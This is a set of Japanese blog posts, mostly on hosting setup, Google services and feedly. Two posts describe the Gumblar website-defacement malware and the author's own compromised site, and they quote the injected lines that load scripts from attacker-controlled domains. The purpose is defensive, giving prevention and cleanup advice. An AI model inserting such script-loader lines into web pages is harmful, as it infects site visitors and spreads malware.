ハッスルサーバーとGoogleAppsを1つのドメインで併用する方法

今回は仕事で新しく独自ドメインを取得してWebサーバーを月額200円くらいのハッスルサーバーにしてメールをGoogleAppsで使ってみようという事になったのですけど、ちょっとつまった事があったので忘れないようにメモ。

まずは今回の前提でドメイン取得はムームードメインを使用します。
バリュードメインでも別によかったんですが使い慣れたムームーDNSでやってみようと思いましたので今回はムームーで。

ステップ1.ハッスルサーバー側でドメインを認識させる。
ドメイン取得の方法は割愛しましてまずはハッスルサーバー側で取得したドメインを認識させてディレクトリを割り当てる作業から。
ムームーにログインして「ドメイン詳細」→「取得したドメインを選択」→「表示をクリック」→「ネームサーバー設定変更をクリック」という手順でネームサーバーの変更画面に移動します。
で、まずはここで上記以外 のネームサーバを使用するを選択し、ネームサーバーの欄にハッスルサーバー側で指定されたns1.naid.jp、ns2.naid.jpを設定します。

こんな感じです。

で、続いてハッスルサーバーにログインして独自ドメインを割り当てます。
「独自ドメインの設定をクリック」→「新しいドメインの追加をクリック」するとドメインの設定画面が出るのでドメイン名とサイトデータを格納させたいディレクトリを設定します。

※もちろん中身はあたりですよ。あと、ポイントとしてwwwありの場合となしの場合を設定しましょう。(また別の機会で気分が向いたら説明しますがwwwがついたほうとついてない方はドメインとサブドメインの違いがあります。)

これで一旦Webサーバーの設定をしたのでこの段階でサイトが表示できるようになります。

ステップ2.GoogleAppsを設定する
続いてはメールを使えるようにしたいのでGoogleAppsの設定を開始します。
まずはGoogleAppsのアカウントの取得から。
http://www.google.com/a/cpanel/domain/newから順番どおりにやっていけばアカウントは取得できます。
もしつまったらGoogleAppsの説明サイトにもやり方が載ってるのでそっちを参考に。
で、アカウントを取得したので取得したアカウントをドメインと関連付けさせます。
やり方はこれまたこっちのページにあるのでこっちを参照。
今回はドメインのCNAMEレコードを設定する方法にしたのでCNAMEを変えないといけません。
なのでムームードメインにログインしネームサーバーをさっきの分からムームーDNSに切り替えます。
この設定中はサイトにアクセスできなくなりますので注意が必要です。

まずはサイドメニューのムームーDNSセットアップからGoogleAppsの指示通りにCNAMEレコードを設定します。
設定を完了させたらGoogleApps側に通知する前に再度「ドメイン詳細」→「取得したドメインを選択」→「表示をクリック」→「ネームサーバー設定変更をクリック」という手順を経てさっき設定したネームサーバーからムームーDNSに変更します。
これがけっこう忘れがちなので注意しましょう。
で、ムームーDNSの設定完了後はGoogleAppsでドメイン所有者の確認を行えばOKです。
所有者の確認は最大で48時間かかりますので今回のように新規ドメインで設定する場合はそんなに問題ありませんが既存ドメインで移行する場合はけっこう厄介ですね。何か対応方法を考えないと・・・。いいアイデアがある人は教えてください(笑)

ステップ3.ドメイン確認後の各種設定
ここまでのステップは比較的簡単なんですけど、こっからが少し厄介でした。
というのもハッスルサーバーはさっき指定したネームサーバーをムームーDNSのAレコードに設定してもWebサーバーとして認識しないんです。
なので困りましたがネットで探してこちらのページに記載してある方法でうまくいきました。
まずは説明にあるようにハッスルサーバーの収容サーバーを探します。
ハッスルサーバーのコンパネにログインしアカウント情報を確認すると今回の収容サーバーが判明。

今回取得したアカウントではrs24.naid.jpでした。

で、この収容サーバーアドレスのIPアドレスを特定します。
サイトに説明にあったようにスタートメニューからファイル名を指定を行いcmdと入力しOKと選ぶとコマンドプロンプトに移ります。
ここで先ほどのアドレスを使って「ping s24.naid.jp」と入力しEnterを押すとこのサーバーのIPアドレスが182.48.18.24である事が分かります。

IPアドレスが特定できたよ！

これでムームーDNSに入力するAレコードの値が分かったので設定を反映するためにムームーDNSの設定画面へ。
Aレコードの設定以外にも今回はGmailのみでなくGoogleカレンダー・Googledocsなども使おうと思ったので合わせて設定を行います。
そっちの説明はこちらのページを参照してください。
で、実際に設定した画面がこちら

かなりややこしく見えますが実際はコピペをしていくだけなのでそんなに難しくありません。
一応中身に説明を
AレコードはWebサーバー用です。wwwのサブドメインがあるほうとないほうを両方とも調べたハッスルサーバーの収容サーバーのIPアドレスを設定します。
MXレコードはメール用なのでGoogleAppsでの指示通りに指定します。
CNAMEレコードでGoogleApps側で使用するサブドメインをこれもGoogleAppsでの指示通りに指定します。

ただ、ここで僕が実際にやったミスなんですがサブドメイン項目の空欄部分に間違った情報を記入すると設定がうまくいきません・・・。
実際にここでけっこう長い間なんでかなーって詰まってました。

これで設定は完了。
Webサーバーの方はムームーDNSでの設定反映後にかなり早くの段階で変更が適用されましたがGoogleAppsのMXレコードの確認がかなり時間がかかる感じです。これも最大48時間かかるんですって。
今後の課題はこの設定時間をどうするかですね。新規はいいとしても既存のものを移行させようとするとこのタイムロスは大きいですね。
というわけで何かいい情報を持ってる方はよろしくです(しつこいｗ)

feedlyがかなりいい！

今更感がありますが最近feedlyを使うようになりました。
feedlyを知らない人向けに説明しますと、GoogleReaderの見た目を変えて使うサービスです。
使うにはFirefoxのアドオンかGoogleChromeの機能拡張で使うことになります。
Chromeをメインにしている僕にはちょうどいいです。
僕も使うまではGoogleReaderでいいやんと思ってましたが、実際使ってみるとGoogleReaderよりも好きになってしまいました。
その気にいった理由なんですが

・RSSの表示がきれい
別にGoogleReaderでも読めるんですが「もう少しだけまじめに読みたい」と思う回数が増えました。見た目で読む気にさせる効果が僕は上がりましたｗ

・RSSの情報整理がしやすくなった
これも完全に僕の主観ですが、feedlyでタグ分けしてFeedの属性毎に整理整頓するととてもすっきりしました。
しかも更新されたFeedはタグも表示してあるので「これはあとでいいや」というやつはスルーしておけばいいから作業の邪魔にもなりません。

・feedlyでの未読処理がGoogleReaderでも継承される
feedlyはGoogleReaderのシステムを利用しているのでfeedlyで読んだfeedはGoogleReaderでも未読の扱いになります。
なので例えば外出先等でGoogleReaderもしくはfeedlyでfeedを確認した場合どこでも未読の扱いになりますので一度読んだ情報を再度読むということはなくなります。

というのが大きなポイントです。
他にも機能はいろいろあります。
詳しくは以下参照
feedlyがすごい – Google Readerユーザーは試す価値あり

ただ、ちょっとだけつまずいた点があったのでメモがてら書いときます。

表示が変わってしまった
feedlyの基本画面はこんな感じ

なんですがこの画面がこんな風に

横にナビゲーションが出てきてしまいました。
理由が分からなかったのでもやもやしていましたがその理由が分かってすっきり
その理由というのが「ブラウザの大きさに応じてレイアウトが変わる」というものすごく単純なものでしたｗ
画面が大きくなると表示する情報が増えるという画面設計のようです。

feedlyでのRSSfeedの追加
GoogleReaderだと左上のボタンにURLをRSSのURLをコピペすれば登録feedの追加が出来ましたがfeedlyの基本画面ではボタンがなかったので一瞬分からなかったんですがよく見ると右上に小さく「+」があります。これをクリックするとfeedのURLを入力する画面が出てくるのでfeedを追加できます。

「+」で追加

ナビが出てくる画面の場合は右上の方の「add source」のテキストリンクで同様に追加する画面になります。

「add source」のテキストリンクで追加

また発見があれば追記します。

Googleのリアルタイム検索日本版がスタート

いつもRSSで読んでるサイトでchocotsというサイトがあるんですがそこで気になる記事が更新されました。
それがこれ
グーグル、リアルタイム検索日本版を開始、最新のTwitterを検索可能に
詳しくはchocotsを見れば分かるんですが、どうもgoogle.co.jpでもTwitterのリアルタイム検索が出来るようになったようです。
なんといってもTwitterの即時性の部分までもが検索対称に加わったという事はかなり大きな衝撃ですね。
検索結果画面に表示されるツイートは人間かbotかまで判断できるという事なのですごいことです。

これでTwitterを利用したマーケティングだとかビジネスがもっと盛り上がったりするんでしょうね。
そこに参加するにせよしないにせよ知っておく事が必要だと思うので今後もこれ系の話にも注意しておこうと思います。

Gumblar.xによる改竄のまとめ【予防と対策はしっかりね】

ここ最近twitterでもこれの話題ばっかりツイートしてましたが知っとかないとかなり危険なものなのでまとめておきます。
まだ不十分な方はやっておきましょうね。

【対象ユーザー】
サイト管理者・Web担当者・一般ユーザーを含むWindowsユーザー全員

【感染経緯】
改竄されたWebサイトの閲覧によるスクリプトの読み込み許可で感染

【感染後の流れ】
まずはFFFTP等のFTP情報が盗まれます。
（FFFTPだけではなくほぼ全ての無料FTPクライアントが危険という認識でも問題ないレベルだそうです。未確認情報ですが。）
次に盗まれたIDとパスワードによりWebサイトが改竄されます。
改竄後はサイトに以下のような症状が現れます。

サーバー上のhtml、php、ｊｓファイルに外部サイトのスクリプトを読み込む記述が追加される。
HTMLやPHPには<body>タグの前に
<script src=http://Gumblar.x/_vti_cnf/nov_news_0403_PCGemilang.php ></script>
JSには最後に
document.write(‘<script src=http://Gumblar.x/images/index-2.php ><\/script>’);
のように追記されます。
（上記のアドレスは適当なやつですので実際には複数の色々なドメインになります。）

この状態までには管理者が気付かないまま進行します。
改竄されたサイトを放置しておくと感染の拡大になるのでサイトのデータを一旦削除し対策を行った後サイトの再開をすることをおすすめします。

※現在わかっている範囲の情報ではサイトの改竄はスクリプトコードが書き込まれるのみですが今後はわかりませんので注意が必要です。

【感染の予防】
とはいえ、まだ実際に感染したかどうか分からない場合は予防策として以下のような事をしておくことが推奨されています。

・「Windows Update」（Microsoft Update）の”自動更新”を有効にする。その後の手動更新も忘れずに行う方がいいと思います。
・「Adobe Reader」を最新版に更新する
・「Adobe Reader」の設定でJavaScript機能を無効にする（編集→環境設定→JavaScript→Acrobat JavaScriptを使用のチェックマークを外すことで無効になります。）
・「Adobe Flash Player」を最新版に更新する
・ 「Java」を最新版に更新する （不要なら削除、あえて導入する必要はない模様）
・ 「Apple QuickTime」を最新版に更新する （不要なら削除、あえて導入する必要はない模様）

【もし感染してしまったらor感染したかもしれない疑いがある場合】
セキュリティソフトで全てのドライブをスキャンしてウィルスが検出されるかどうかを確かめましょう。
仮に検出されてしまった場合は感染している疑いがあるのでOSの再インストールをした方がいいと思います。
他にも色々手段はあると思いますが、OSの再インストール後にセキュリティソフトを最新バージョンにアップデートするのが感染後の最良の手段でしょう。
もっといい手段がある場合は教えてください。
もちろんOSの再インストール前にはデータのバックアップをお忘れなく。

【サイトの再開に向けて】
OSを再インストールし、セキュリティソフトを最新バージョンにアップデートしたあとは一旦停止させていたサイトを再開しても大丈夫だと思います。
バックアップしたデータをその記録媒体ごとセキュリティソフトで診断し、ウィルスが混入していないか確認します。
何もない場合はそこから以下の手順でサイトを再開させましょう。
（以下はレンタルサーバーを借りて運営している場合の手順です。こうでなくてはいけないわけではないので御自身の判断でしてみてください。）

1.サーバーのコントロールパネルからFTPパスワードを変更する。
（仮にID,PASSWORDが漏れていた場合には次からアクセス出来ないようにするためにはパスワードの変更がいいと思います。）
2.FTPでサイトに接続し、一旦全データを削除する。
3.データをアップロードしなおす。
4.サイトをが改竄される前の状態に戻ったか確認する。

※FTPのパスワードは感染していないPCから行わないと意味がありませんので注意が必要です。

【最後に】
上記の事は僕がここ数日間かけて調べたことのまとめですがこれが必ずしも正しいというわけではありません。
スパイウェアなのでアップデートしたものでも感染してしまう場合がありますのであくまで参考までに。

サーバー移転をしました。

こにくたらしいウィルスのせいでサーバー移転をするハメになりました。
どんな事が起こったのかをまとめてみました。
同じ境遇に陥ったら参考にしてください。

まず、予兆とか一切なくいきなり下の画面のようにサイトに訪れると警告画面になります。

警告画面。いきなり出てくるとけっこうびびる。

ちなみにブラウザがGoogleChromeだけしかでませんので注意。
一応手元にあるIE8、Firefox3.6、Opera10、Safari4.0で確認しましたが上のような画面はでません。
Googleに感謝！さすがGoogleChrome。メインブラウザGoogleChromeにしてよかったｗ
で、Googleさんの診断は以下のような感じ。

Googleによる診断

どうもページの中に疑わしいURLを読み込んでまっせってな感じのことが書いてあります。
おかしいなと思い勇気を持って確認してみると・・・・

何だこの1行？こんなソース書いた覚えがないが・・・

なんてこったい！HTMLのソースに変な1行が追加されてるよ！外人なら「OH MY GOD！」もしくは「OH!SHIT!」ト叫ぶ場面です。
冗談はさておき完全にサーバー側に置いてあるHTMLが改竄されちゃってます。

ttp://paragonengg.com

ってう疑わしいサイトを読み込むJSが書き込まれてます。
しかもそのサーバー内のHTML、PHP、CGIとか画像以外の全てに！
（上記URLはアクセス出来ないように先頭のhを抜いてます。Googleが怪しいていうサイトなので絶対にアクセスしないでください。アクセスしても僕は責任取りません。）

というわけで完全にこのままにしておく訳にはいかなくなったのですが、まずはなぜこうなったのかの原因を突き止めないと怖いのでまずはローカルがウィルスに感染していないかをチェック。
信頼するESET SMRT SECURITYを使い全ドライブをスキャンします。
全てのドライブをスキャンしとところ検出はなしでした。
ここはESETを信用し、ローカルに原因がないという事にすると原因はサーバー側かという事になりますよね。

借りてるサーバーは安い共用サーバーなので他のアカウントのやつからサーバーにウィルスが侵入したんじゃね？と思いサーバーにメール。
サーバー会社（どこかはいいませんがヒントは月1000円以内のところですｗ）からは半日ほどすると回答が。
しかし回答は、
・運用スクリプト、CGIのセキュリティホールがある
・共有環境からパスワードが漏れる形でアクセスしてしまっている
・ウィルスによりメール等のPC上のファイルが外部に送信されてしまっている
というのが疑わしいですねという事。

要は「自己責任なんだから自分で何とかしてね」という事です。
というわけでローカルには原因もないのでサーバーを移転することにしました。
さようなら安いサーバー。今までありがとう。

移転先はFTPが暗号化されるFTPSを使えるそこそこ安いサーバーですｗ
これで仮にこのPCが原因だったとしてもサイトは大丈夫という事になると思うのでしばらく様子見です。

ちなみに最近話題のガンブラーはJSファイルに書き込みがあるパターンが多いというので、今回のパターンは少し違うのでおそらくガンブラーではないかと思います。
また、ガンブラーにこのPCがやられちゃってる場合はこのサイトだけでなく僕のサイト全部にこの症状が出てしまうはずなので9割型こっちの問題ではないはずです。もしちがってたらすいません。

追記：JSファイルにもdocument.write(‘＜script src=http://bsk-spedition.de/いめーじす/index-2.php ＞＜/script＞’);みたいに書き込まれてるのも発見！対象はhtml、php、jsということでGumblar.xでほぼ確定。
となるとESETが未発見ウィルスなので検出しなかっただけという可能性もできてました・・・・。
確定したらOSの再インストールをしないと・・・・・。
ああめんどくさいなあああああああああああああ

さようならIE6宣言

今日Googleからあるメールが届きました。
僕に取っては非常に嬉しいニュースなのですが、件名は「Google からのお知らせ – ブラウザサポートについて」というもの。
内容としては2010年3月1日にIE6とFirefox2.0のGoogleドキュメント、Googleサイトエディターサポートを停止するというものです。
また、2010年後半にはGmail、Googleカレンダーのサポートを停止する予定という内容です。
ちなみにIE7以上、Firefox 3 以上、Safari 3 以上、GoogleChromeへのサポートは引き続き行われるそうです。

仕事上も大きく関わってくることですが、IE6が事実上切り捨てられたことは素直に嬉しいですね。
色々欠陥のあるブラウザなのでこれでお客さんにも「GoogleはIE6のサポートを終了しますよ！」と声を大にして言えるのがいい感じです。
コーディングのブラウザチェックの手間も減りますしね！
というわけで僕は今日から「さようならIE6」を宣言しますｗ
まだシェアは20％もありますが、今でも以前のようにネスケを前提とするところがないのと同じようにIE6はすでに過去の遺物であるので今後はIE6は「ないものor過去の話」という前提で話をすることにします。

ちなみにこんなキャンペーンも過去にありました
「IE6はもういらない」――Web企業が撲滅キャンペーン

Googleカレンダー

今日は今更ながらなお話ではありますが、Googleカレンダーのお話を少し。
Googleカレンダー
まあ今更ながらなのではありますが、最近仕事の関係上大阪と東京のスタッフ間の連絡のやりとりをいかにスムーズにかつ便利に行うべきかという事を考えていまして何かいいツールはないかなと探していました。
で、ベタにGoogleカレンダーに行き着いたわけですがよくよく見てみると結構いい機能が満載です。
そこで今回はGoogleカレンダーのここがいいよね！っていうポイントをおさらいです。
1.表示スピードが速い。
まあいわずもがなのGoogleのサーバーですのでスピード面はさすがに早いです。動作のスピードと読み込み速度は業務にも差し支えるポイントなのでやはり気になるところです。
2.携帯でもアクセス！
携帯でGoogleカレンダーにログインする事もできるので予定等の確認を携帯で見れちゃいます。
これで出先のちょっとした時間に次の予定等を確認できます。
3.公開範囲の設定
仕事で使う場合に気になるのはやはりセキュリティ面。
公に出せない、出したくないスケジュールもありますがGoogleで管理できるので見て欲しい人だけをアカウントで選別して公開範囲の調整が出来ます。
4.通知の設定
アラームでメールを飛ばしてくれるので忘れそうな場合とかでも使えますねｗ
5.埋め込み用のスクリプトがある。
他のサイト上で公開したい場合にも利用できるように埋め込み用のタグがあります。
もちろんカスタマイズも自由です。
6.表示領域の変更がスピーディ＆見やすい
ここはサーバーの速度の話ともかぶりますがタブでの切り替え速度が速いです。
あと、当日・週・月・4日の単位でスケジュールを見れるのでその場合によっての状況把握がしやすいです。
といった感じなのですが、しっかり見てみるともう少し使える点がありそうなので今日はじっくりそのほかにいいポイントがないのか調査をしてみようと思います。

GoogleAdWords 広告配信エリアが拡大

今日は朝からビッグニュース！
GoogleAdWords公式ブログによると検索結果下段にも広告を配信するアリアを設定したとの事。
詳しくは以下で。
Inside AdWords-Japan: 検索結果ページの下段にも広告が表示されるようになりました
画面は下記のようなイメージです。

この広告エリア設定による効果がどうなるのか今後非常に楽しみです。

Googleあおむし

今日は春分の日でお休みなのですがGoogleがエリックカールとコラボしてロゴを変えていました。

Googleあおむし
Googleは結構昔から季節に合わせたロゴを出す事で有名だったりします。
調べてみたらこんだけありました
もっと Google: ホリデー ロゴ
かなりいろいろやってますね。1999年からしている事にもびっくりです。
昔から一貫してやっているそのスタイルにも感心せざるを得ません。

Google焼きでできること

今日はお昼から妻と一緒に千日前のおかるに行ってきました。
なぜ千日前に？という理由ですが今GoogleがやっているGoogleで、できること

のキャンペーンの大阪版の目玉企画？Google焼きを食べるためにお昼休憩の時間にいってきた訳です。
で、早速定番の豚玉を注文し焼き上がりを待つと店員さんがマヨネーズで絵を書いてくれました。

Google焼きです。Googleとなぜか通天閣を書いてくれましたｗ
この期間中はGoogle焼きを食べると特製ストラップがもらえます。

キャンペーン用の紹介動画もあるので気になる方はどうぞ。

今回は少しGoogleに踊らされてみましたｗ